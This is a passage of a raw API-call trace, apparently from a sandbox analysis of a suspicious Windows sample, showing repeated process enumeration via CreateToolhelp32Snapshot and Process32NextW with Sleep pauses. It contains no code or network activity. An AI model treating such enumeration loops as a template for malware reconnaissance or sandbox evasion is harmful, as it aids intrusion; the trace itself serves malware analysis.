th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0112.313] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0112.318] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0112.319] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0112.321] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0112.322] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0112.323] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0112.324] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0112.325] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0112.326] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0112.327] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0112.328] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0112.329] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.330] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0112.331] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0112.332] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0112.333] CloseHandle (hObject=0xbc) returned 1 [0112.334] Sleep (dwMilliseconds=0x12c) [0112.766] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0112.771] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.771] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="System")) returned 1 [0112.772] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0112.773] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0112.773] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0112.774] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0112.775] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0112.775] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0112.776] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, 
szExeFile="lsass.exe")) returned 1 [0112.777] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0112.777] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.778] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.778] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.779] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.780] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.780] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="audiodg.exe")) returned 1 [0112.781] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.782] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.782] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0112.783] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.785] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0112.786] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0112.787] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="dwm.exe")) returned 1 [0112.788] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0112.789] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.790] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0112.791] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0112.793] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0112.794] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0112.795] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0112.796] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0112.797] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0112.798] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0112.799] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0112.801] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0112.802] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0112.803] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0112.804] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0112.805] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0112.806] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0112.807] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0112.808] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0112.809] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0112.810] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0112.811] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0112.812] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0112.872] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.873] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0112.874] CloseHandle (hObject=0xc4) returned 1 [0112.874] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0112.879] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.880] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 
[0112.880] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0112.881] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0112.882] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0112.882] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0112.883] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0112.884] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0112.884] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0112.885] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0112.885] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.886] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.887] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.887] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.888] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.889] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0112.889] 
